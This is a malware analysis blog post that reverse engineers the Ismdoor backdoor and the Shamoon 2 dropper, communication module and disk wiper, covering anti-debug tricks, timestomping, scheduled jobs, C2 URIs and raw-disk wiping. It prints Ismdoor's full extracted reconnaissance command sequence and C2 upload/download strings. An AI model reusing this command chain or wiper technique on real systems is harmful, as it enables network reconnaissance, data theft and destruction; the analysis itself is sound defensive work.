Dissecting Greenburg Campaign Ismdoor and Shamoon / Disttrack.B

So recently I got my hands on Ismdoor backdoor from the Greenburg campaign, which is linked to spreading Shamoon 2 or Disttrack.B mainly at numerous entities in the Gulf region. Machines infected with Shamoon 2, also had traces and indicators of Ismdoor backdoor on them. It is theorized that Ismdoor was responsible for getting foothold in the network, moving laterally and harvesting credentials, which were later used by Shamoon 2 to spread in the network and creat havoc. 

https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon

This blog post is interesting, as here I have analysed Ismdoor, Shamoon dropper, communication module and the wiper module.

It took me some time to evade the anti-analysis techniques deployed by malware author. However, this was not because the techniques were very advanced but mainly because I was not looking at the right place ;) . Also non-usage of packing or obfuscation techniques was favorable scenario.

The Ismdoor sample I got hold had a compilation date of 26 July 2016. 

MD5: bf4b07c7b4a4504c4192bd68476d63b5

VT: https://virustotal.com/en/file/7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c/analysis/

Some indicators

We can see addresses of APIs are being XORs and stored

And then the XOR key (5E644B57h) itself being stored for later use to get API names

Some file names can be seen in the resource section Tmp765643.txt, Tmp9932u1.bat and tmp43hh11.txt. Also a reference to some strings like "tasklist" "findstr -i", indicates that the sample will look for certain task from the running processes:

Now this is crazy. Why would the author have all of these strings in clear text and unobfuscated. This clearly shows the purpose of the code, to gather a lot of information about the running system:

Following are what I found:

All of this info is to be pushed to Tmp765643.txt. There is information about domain, username, ipconfig, net view to give info on other machines in the network, list of local users using net user, netstat -anb to get info on connections, systeminfo to get info on what is installed on the machine, patches, network card info, BIOS info, timezone etc, tasklist to see what is running, sc query to get list of all services, using WMIC to gather info like Antivirus, Firewall, Antispyware installed on the machine

-------------------------------------------------------------------------------------------------------------------------

WinHttpClientGETPOSTCookie: charset={[A-Za-z0-9\-_]+}Content-Length: {[0-9]+}Location: {[0-9]+}Set-Cookie:\b*{.+?}\n; ;utf-8{<html>}{</html>}\Microsoft\Windows\Tmp98871\Microsoft\Windows\TmpFiles.txthttp://

//:localhostC:\ddd\wer2.txtHome/CCContent-Length:

Content-Type: application/x-www-form-urlencoded

Ok txt

cmd /a /c echo ========================== (User Name) ========================== > "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo %userdomain%\%username% >>"%localappdata%\Microsoft\Windows\jTmp765643.txt" 2>&1

cmd /a /c @echo off

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== (IP Config) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c ipconfig /all >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo off

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== (Net View) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c net view >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo off

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== (Net User) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c net user administrator /domain >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo off

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== (NetStat) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c netstat -ant >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo off

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== (SystemInfo) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c systeminfo >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo off

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== ( TaskList) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c tasklist >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo off

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== ( ServiceList) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c sc query >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo off

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== (SecurityInformation) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cls

cmd /u /c type "%localappdata%\Microsoft\Windows\jTmp765643.txt" > "%localappdata%\Microsoft\Windows\Tmp765643.txt"

del "%localappdata%\Microsoft\Windows\jTmp765643.txt"

del "%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path AntiVirusProduct     Get        /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct    Get        /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path FirewallProduct        Get        /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct       Get     /Format:List >>    "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path AntiSpywareProduct  Get   /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiSpywareProduct  Get  /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

-------------------------------------------------Some other interesting Strings----------------------------------

A lot of inferences can be made by just looking at these random strings and there is a possibility to see some Command and Control related stuff, like commands issued by the C2 server to be executed by the bot.

rem %localappdata%\Microsoft\Windows\Tmp765643.txt#1;\Microsoft\Windows\Tmp9932u1.bat\Microsoft\Windows\tmp43hh11.txt" & exit)" > "(tasklist | findstr -i "

"del "|||2222222222222222222222222222222222222222222222222222222222222222------Boundary%08X

Content-Disposition: form-data; name="uploaded"; filename="%08x.dat"

Content-Type: application/octet-stream

------Boundary%08X--

Content-Type: multipart/form-data; boundary=----Boundary%08XMozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: closeContent-Length: %dHome/SCV/Home/SF?commandId=CmdResult=-2&message=appId=Home/BMWinHTTP Example/1.0text/txt/Home/GF?commandId=Error %u in WinHttpQueryDataAvailable.

Out of memory

Error %u in WinHttpReadData.

DownloadFile|||Command executed successfullyError %d has occurred.

AppIdGeneralDownloadFileUploadFile%appdata%,%appdata%/Home/SF?commandId=|||Command executed successfullyschtasks /Delete /TN UtilityCheckUpdate /F\Windows Update.lnkdel \Microsoft\Windows\TmpFiles")\Microsoft\Windows\Tmp*" & rmdir "\temp\KB*" & del "" & del "\temp\" /f & del c:\windows\temp\KB* & del "(taskkill /im "Home/AVcd=Home/CRChangeAliveSeconds:::DoneChangeAddressSI\Microsoft\Windows\Tmp9932u1.bat")("GetSendAliveSecondsSendAliveSeconds:::restartremove-2.txt\Microsoft\Windows\Tmpedi98871\Microsoft\Windows\Tmpedo98871Executed Successfullyinvalid vector<T> subscriptvector<T> too long¸-(`%lu%u%d%I64dinvalid stoi argumentstoi argument out of range%dsystemIsm.exe­pÒ§žØRD”¥§pp­pÒ§žØ¬RЯN­ß½æ­ß-*Ô-p+' +'P+'pu(€u(`(à{(À}(0(Ðt(-H­(à-iº(p8-P­(4-éº(pè-p+' +'P+'pu(€u(`(r(°s(ì'Ðt(CÐ-P¿(:':' ¿( ¿(À(°¿(À¿(ð¿(Á(P(€(°(`(p;'$-À€(PÙ'`Ù' j(l(À(0m(pm(ð¿(Á(°o(Ðp(Ðq(0r(pr(ü-@­(@-yÂ(`-(\/>>> 2>&1" 2>&1 > " /c \cmd.exe§ÔÐÒØ¥¶&”‚‡N¥¯p§¬nž­6D!¨(æð5@Ž¾¿½†ß­'R¦—Invalid character .\*\" /f & "list<T> too longY@ðAAccess violation - no RTTI data!Bad dynamic_cast!Hàv-°-´RSDSÓÌÂO»æÐLœè

---

ç^ÚH…F:\Projects\Bot\Bot\Release\Ism.pdb 


--------------------------------------------------------------------------------------------------------------------------

Next we see some strings where the backdoor is looking for a process called "Ism.exe" and throwing the output to tmp43hh11.txt

Ref: https://blog.vectranetworks.com/blog/an-analysis-of-the-shamoon-2-malware-attack\

The process is created and data places in the temp file

Since the Ism.exe process is not found to be running the empty temp file is deleted:

Ok I believe the file Tmp98871 which is written to the disk, contains the Bot/Client ID, which somehow is created using binary pattern in the .rdata section (discovered this after quite trouble..going backwards using hardware breakpoints etc..This is sent across to the C2 server to identify the bot with backdoor on it.

The file being written to the disk with 65 bytes of Bot ID:

Now it is time to communicate with the C2 server and send info out. We can see the user agent which is created. Simply: "ًWinHTTPClient"

We can see the URL to which our request will be POST (ed) to:
http://update(dot)winappupdater(dot)com/Home/CC:

We can see connection on port 80 (50h)

We can see some request headers are being added like "Content-Length", "Content-Type":

 Sending the HTTP POST:

In case of failure it checks for IE proxy config:

Opens the temp file with BotID to send the data out:

Malware also creates this folder: c:\users\<username>\appdata\local\microsoft\windows\tmpfiles. This could be to store the output of the commands which are executed by the malware.

Anyhow the communication fails as the domain does not exist anymore

I re-directed the DNS to a fakedns and tried communicating with a fake C2 web server. To see the request, which can be useful in creating IOCs and snort rules:

 Now since I saw some good number of embedded strings in the code itself I thought of doing a quick good old string analysis instead of trying to feed commands to it from the fake C2 server.

Here I can see that C2 server would instruct the Bot to download a file, which could be an info stealer, mimikatz or some other hacktool to be downloaded to the machine:

Some more references to DownloadFile and also UploadFile (for data exfiltration)

The following string clearly indicates that some scheduled task named "UtilityCheckUpdate" was instructed to be created and later deleted. Another good candidate for hunt.

Next we can see the URIs involved during C2 comms, where commandid is sent across:

We can also see appid and message parameters, which could also be part of the URI while constructing C2 command replies

The Bot could be replying to the C2 server with the result of executing a command like below:

Using this C2 channel, Ismdoor backdoor, if undetected, could have easily harvested credentials, moved laterally etcand relayed back info

-----------------------------------------Reversing of Shamoon / Disttrack.B-------------------------------------

 I got hold of two Shamoon samples. Doing a quick static analysis, helps to identify some large resources, some anti-debugging API names, and more interestingly API Calls for creating and managing services and usage of netapi32 library and relevant APIs for creating automated tasks (ATs) or jobs:

Ref: http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

Next, using CFF explorer I can see the resources PKCS7, PKCS12 and X509, which will be used by Shamoon to drop two modules: C2 comm and lateral movement module and the wiper module. The wiper module will drop the ELDOS driver in the system32/drivers directory and use it to wipe the system.

Some screenshots from PA Unit 42 analysis:

There is some more interesting strings in the dropper indicating that a service called "TrkSvr" with binpath in the sysem32 folder will be created.

Dynamic analysis confirms drop of netinit.exe and trksvr.exe in the system32 folder. Trksvr.exe is the same file (the dropper), which just relocates to the system32 directory. netinit.exe is the C2 comm module.

I can see the service, TrkSvr created with display name as "Distributed Link Tracking Server", which is very similar to a the display name of another service called TrkWks. This is to make the service look genuine.

We can see the mutex handle of "BaseNamedObjects\DBWinMutex" being created by the trksvr.exe service:

Procmon shows the registry keys which are written:

Who is Jude. We can also see a string where netinit.exe is passed on a parameter 1. This could be used for the scheduled job which will be created:

 A lot of other file names:

 We can see copying of the sample from original location to system32 folder:

Next we see the file is opened for RW:

Next we see the malware tampering with the timestamps of the file (time stomping). This is to thwart forensics (timeline investigations)

Next we see SCManager is opened

Next it tries to open a service with name TrkSvr. This is to check whether the service exists or not:

Once the error is thrown that service does not exist, the service is created:

We can see the properties of the service TrkSvr

And detailed description:

 We also see that the LanmanWorkStation (Workstation) service is opened and queried to see whether it is running or not. If not then it is started. This is to enable usage of SMB for lateral movement.

In order to quickly reach to the anti-debug technique of Sleep call, I executed the sample and then attached the debugger to the tksvr service which is created, which landed me to the sneaky little sleep call, which I bypassed

Can also seen some interesting JMPs

Bypassing the Sleep I landed at a thread creation, which takes me to another anti-debug mechanism of "GetTickCount" and it compares the current tick counts to a value of 0C880h

Comparing the tickcount result with a stored value of C880h:

If I do not bypass this, it takes me back to the sneaky Sleep call, basically a combo of gettickcount and sleep call puts the code in an infinite loop.

However, bypassing leads me to a code branch where many files in system32 directory are attempted to be deleted:

 Following are string references of those files:

The dropper TrkSvr tries to read something from this file, but this file is non-existent, which was the reason why the execution kept failing. So I had to bypass this as well. Anyhow, with some research I found out that this file "c:\windows\inf\netft429.pnf" contained the timestamp against which Shamoon compares the current date/time and decides to execute its code:

The malware TrkSvr aka dropper aka Shamoon, then disables Wow64FsRedirection, so that the files written in system32 folder on a 64 bit machine are also written to c:\windows\system32 and not on the wow folders.

The dropper then tries to get a handle to read itself:

I come across yet another anti-debug mechanism, which I bypass:

And yet another anti-analysis mechanism (looking at running processes to find suspected on-going analysis)

After some struggle with anti-analysis techniques, I finally reached where PKCS7 resource is accessed to drop one of the module netinit.exe of Shamoon:


------------------------------PKCS7 - The no good Comm module-------------------------------------------

 We can see the resource being located and loaded:

Creating netinit.exe in system32 folder from the PKCS7 resource:

Writing the file headers on the disk first:

This is where PKCS7 is getting decrypted from raw resource bytes to the text section of netinit.exe and being written to netinit.exe one byte a time !

 One byte at a time. No use of buffers

But still it is partially written. Next we see VirtualAlloc called, most prolly to write payload of netinit.exe in memory and run it from there while writing it also on the disk.

The memory is written with payload:

Writing the file to disk from memory:

The code then proceeds to open the file "netinit.exe" for read/write and then changes the file time (timestomping) to thwart forensics.

Another VirtualAlloc call to allocate space in memory to store the parameter of an AT (automated task or job)

We can see that netinit.exe will be executed with parameter 1 by the scheduled job:

Trying to retrieve date/time from a remote server but does not succeed

Then we see a strange method for memory allocation from heap by using NetAPIBufferAllocate API call:

Seems like a scheduled job is being created for persistence of netinit.exe module:

Now lets compare the AT_INFO Structure pointed to by 00B2DF70h above with the function specs:

The command is pointed to by the following location (fifth parameter pointed by pointer 01510000h):

If we go to this location we can see the following:

Next we see that the process netinit.exe is called by passing it a parameter 1

 We can see netinit.exe running under the dropper TrkSvr

Some interesting strings found in netinit.exe. netft429.pnf again.

WININET and WS2_32 indicates network communication:

We can see a local ip 10.1.252.19 and a URI /ajax_modal/modal/data.asp. What could this be for?

The netinit.exe module tries to open the pnf file also to read but cannot find it:

Next we see a URL being constructure for an HTTP request:

Here we can see the request being sent to a host called "home", with parameters containing the local ip address and a "status" field created using TickCount + keyboard layout + content of the non-existent pnf file. This however, fails. No idea what is the purpose behind this components as it fails and never really communicates with any C2. Half baked attempt maybe..

Many blogs including Kaspersky and PA has indicated that this module does not work correctly or as intended because of poor coding by the authors.

So I decided to move on to the dropper execution TrkSvr.exe and see what else does it have in store

------------------------------------------ PKCS12 - The Wiper---------------------------------------------------

Going back to the dropper execution, I can see a file name out17626867.txt being accessed with failure as it does not exists. We also see a string "myimage12767" (could this be the image with which the Wiper overrides the bytes on disk)..

The dropper checks whether a file with name "netx.exe" exists in the system32 folder. If not then it accesses PKCS12 resource and loads it:

From the resource editor:

Dumped in memory:

This PKCS12 resource is going to be decrypted and written as netx.exe in the system32 folder, exactly how PKCS7 resource was decrypted and written as netinit.exe:

Just like how PKCS7 was written to decrypted and written to memory and then written to the file on disk, similarly PKCS12 undergoes same process:

Written to netx.exe in system32 folder:

Let us quickly have a look at the strings in the newly dropped binary aka the wiper:

From analysis of the strings we can guess a couple of functionalities of PKCS12 (netx.exe). It looks for information on directories and subfolders under "Users" folder and "Documents and Settings" (XP) folder like "download", "document", "picture", "video", "music", "desktop". The code puts message from error stream to nul (so nothing will be outputted in case of error). In case of no error, the info will be wrotten in file f1.inf in case if its non-XP and in case of XP machines in f2.inf.

We also see a malicious service "drdisk" being created, where a kernel driver "drdisk.sys" is being loaded and executed. 

The most interesting string is the pdb file "c:\shamoon\arabiangulf\wiper\release.pdb" from where the name "Shamoon" originated. While the significance of the word “Shamoon” is not known, it is speculated that it is the name of one of the malware authors. Shamoon is the equivalent of Simon in Arabic. Ref: Ref: https://www.tofinosecurity.com/blog/shamoon-malware-and-scada-security-%E2%80%93-what-are-impacts

Ref: http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper

Some more interesting strings:

Reg keys strings to look for list of partitions in the disk:

Next we see the file nextx.exe is accessed for RW and that is to mess with its timestamps as well:

Timestomped from

 To:

Again VirtualAlloc is being called to store the parameter "command" for the AT (scheduled job) to be created for persistence of the wiper module:

No parameters passed to the wiper module:

Adding a scheduled job:

Let us look what is being scheduled by looking at AT_INFO structure which is passed as a parameter to NetScheduleJobAdd function.

AT_INFO structure looks like following:

So D30000h is where  the "Command" is

Let us look at what the command is:

Scheduled Job created. Now executing the netx.exe process:

As soon as the process executes, it will create the following service as evident from the strings. "The drdisk" service

:

Continuing with the service trksvr.exe execution, it then loads an image

The return value is null, so the image is not there as a resource in trksvr.exe

Had to suspend netx.exe because it was slowing down the VM (while it was wiping data on disk) and I wanted to proceed with reversing further.

by the way the kernel driver (ELDOS) to access the disk already dumped for wiping ;)

We can see the digital certificate of the drdisk.sys in the drivers folder:

Thats about it what the dropper trksvr does.

Let us look at Netx.exe. It tries to look for drdisk service and deletes it if it exists. 

Then then load the resource "ReadOne"with id "101":

Looking at the resources of netx.exe using CFF explorer:

This resource "ReadOne" is decrypted into the drdisk.sys module and dropped into the drivers folder:

Just like the other 2 components, this one is also has the headers written to the memory and then written on disk

The code section is decrypted using this decryption routine and written to disk as well (appended to the drdisk.sys):

The service will be created and started now:

This is where the service drdisk is started.

Meanwhile continuing with analysing netx.exe, why does it try to open this config (pnf) file for read again?

Aaaaa..ok to check whether it exists or not and if not then it writes it on the disk

let us see what is this file. Strangely the file is created with a single null character written to it!

Next we see the malware runs multiple times to check for directories and sub-directories and get that info written in f1.inf and f2.inf files:

We can see the findstr.exe running under netx.exe to locate the directories

File f1.inf and f2.inf are written in the system32 folder

They keep getting appended with dir output, listing all the files in the user profiles:

After creating these files with list of all files in the users directories, the wiperopen the inf file to read:

Now reading f2.inf

After reading all the file paths in both inf files and putting this info into a buffer storage, the wiper proceeds to inquire about systembootdevice from registry:

Also looks for values in "FirmwareBootDevice"

Wiper tries to get systemtime to check whether the curent date is beyond the expiry date of the ELDOS license expiry date. If it is then it sets the system time to a back date:

Setting system time to August 2012 so that the ELDOS driver can be loaded 

System date/time backdated:

What does the following indicates:

Accessing the disk in raw mode for RW using ELDOS driver

Since there is no HardDisk9, so error is returned that path not found. So it tries to go backwards and try to open HardDisk8.7.6..and so on

Once it succeeds, it iterates through files in f1.inf and f2.inf, starts wiping them. It opens a file one by one in read mode, set file pointers and then overwrites them with the image:

Overwriting with the image. Can you see JPEG header in the dump:

Wiping ongoing

The file f1.inf itself got overwritten (wiped) by the jpeg image:

Meanwhile lets see the image. Extracting it from netx.exe using HEx editor:

The image is corrupted. Compare it to the original image:

Next we see the wiper opens \Device\ElRawDisk to write to raw disk

Everything turning into empty icons

Then there is breakpoint on deviceiocontrol function

I am not sure what is IOControlCode 70048, which is passed on to the rawdisk exposed by ELDOS driver. However let us see what is returned to the outbuffer:

Progress:

0 bytes lnk files everywhere

In the end

Boot error. Wipe Successful!